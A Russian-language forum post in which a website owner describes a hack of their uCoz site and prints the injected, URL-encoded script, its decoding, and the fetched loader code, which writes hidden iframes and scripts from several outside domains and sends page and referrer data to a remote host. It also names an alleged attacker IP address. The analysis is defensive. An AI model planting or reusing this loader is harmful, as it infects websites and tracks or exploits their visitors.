Сообщение # 1 | 14:32:17 29 Июн 2013
Привет анон!
Я привлёк твоё внимание? happy

Ну тема такая - меня взломали, и поставили прямо в шапку сайта вот такой вот скрипт:

Код
<script
type="text/javascript">
       <!--
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%   74%70%3A%2F%2F%62%6C%6F%67%6F%76%6B%2E%63%6F%6D%2F%72%74%72%2F%31%33%22%3E%3C%2F%73%63%72%69%70%74%3E'));
//-->
       </script>


Я его расшифровал и получил вот, что:
Код
document.write(unescape('<script type="text/javascript" src="http://blogovk.com/rtr/13"></script>'));

(ну сначала я его удалил и что было в буфере расшифровал)
При этом сайт который ретранслирует(ротатором баннеров) на хостинге uCoz, это сразу понятно по "rtr" после адреса сайта. surprised

Стандартный адрес сайта(данный при регистрации сайта в сааске юкоза) "lineage-gso. ucoz.ru"

А ретранслирует он вот, что за ссылочку:
Код
http://moonhappy.ru/537orcfiknq78u7lzltz4kzw9fgidzp


Ну и то содержимое по ссылке я разобрал:
Код
if (typeof ar_exposure_price === 'undefined') {
       var ar_exposure_price = -2;
}
var test, ppdr_url;
if (!window.p8856c068c8fa54cecd7fcfb11d22b14a) {
       window.p8856c068c8fa54cecd7fcfb11d22b14a = 0;
}(function () {
       if (typeof window['ppndr_code_loaded'] != 'undefined' && window['ppndr_code_loaded'] == true) {
           return;
       }
       var b = (function () {
           var s;
           var d = document.createElement('div');
           if (window.getComputedStyle) {
               s = window.getComputedStyle(d, null);
           } else if (d.currentStyle) {
               s = d.currentStyle;
           } else {
               return {};
           }
           var b = {};
           var r = {
               o: /^O[A-Z]/,
               w: /^webkit[A-Z]/,
               m: /^ms[A-Z]/,
               f: /^Moz[A-Z]/
           };
           for (var k1 in s) {
               for (var k2 in r) {
                   if (r[k2].test(k1)) {
                       b[k2] = true;
                   }
               }
           }
           return b;
       };));
       var ref = (document.referrer && document.referrer != "") ? '&i2a80i=' + escape(document.referrer.replace(/^https?:\/\/(www\.)?/, '')) : '';
       var seed = '&5peq2psk=t' + Math.round(Math.random() * 100000000);
       var referer = escape(window.location.href.replace(/^https?:\/\/(www\.)?/, ''));
       var ft = 0,
           fk = 0,
           fd = 0,
           fu = 0,
           match;
       test = fu;
       document.write('<div class="ccs"><sc' + 'ript charset="utf-8" type="text/javascript" language="javascript" src="http://ergodob.ru/560mqf3rneo6lhimukm"></scr' + 'ipt>' + '<iframe width="1" height="1" style="display: none !important; width: 0px !important; height: 0px !important;" src="http://ergodob.ru/5jubemwaiiz746xv6le4i5k7y?vzakwrtcv=1"></iframe>' + '<sc' + 'ript charset="utf-8" type="text/javascript" language="javascript" src="http://oskale.ru/8jxj3cght1mtscsau"></sc' + 'ript>' + '<sc' + 'ript charset="utf-8" type="text/javascript" language="javascript" src="http://bormoni.ru/660ih6tm1575f7wf5srgb1hni?' + ref + '"></scr' + 'ipt>' + '<sc' + 'ript charset="utf-8" type="text/javascript" language="javascript" src="http://moonhappy.ru/5eas8qc7zvg79cfpcxgaj1nku"></scr' + 'ipt> </div>');
       window.p8856c068c8fa54cecd7fcfb11d22b14a++;
       ppdr_url = 'http://moonhappy.ru/5s5nppui13q7mp31325o9g6bjo7qi43lv694a7kuc?lrs=3eh4l' + ref + seed + (top == window ? '' : '&1asgpkhl5r=1') + '&5xossl1g30qggt=' + referer + '&2w0sg=' + ft + '&3piqn=' + fk + '&3tqfk=' + fd + '&425tt=' + fu + '&16vzv5scb2=' + window.p8856c068c8fa54cecd7fcfb11d22b14a + '' + '&13rixdjeqj=' + (b.o ? 1 : 0) + '&8v26jad2vyz=' + (b.w ? 1 : 0) + '&7s2qaiwvps0lzr=' + (b.f ? 1 : 0) + '&4zl7gydx=' + (b.m ? 1 : 0) + '';
};));
window['ppndr_code_loaded'] = true;
var pop_check_go = '',
       pop_check_cid = '',
       ppdr_s_e = false;


его IP: "31.202.241.147" (он оказывается из Мариуполя Украина вродик)
Хост: 31.202.241.147.format-tv.net
Было это 29 Июня 2013, 10:45
Сам дальше разбиратся не буду, пойду лучше поменяю пароли и пожалуюсь на сайт (может чаво и прокатит), а тебе анон скажу вот что: Не будь беспечным анон, читай данный мануал (тут мануал)меняй пароли каждый месяц и будет тебе счастье)))
Помог? - Ставь "+" в репу ^____^
Сообщение отредактировал webanet - Пятница, 11 Апр 2014, 17:00:01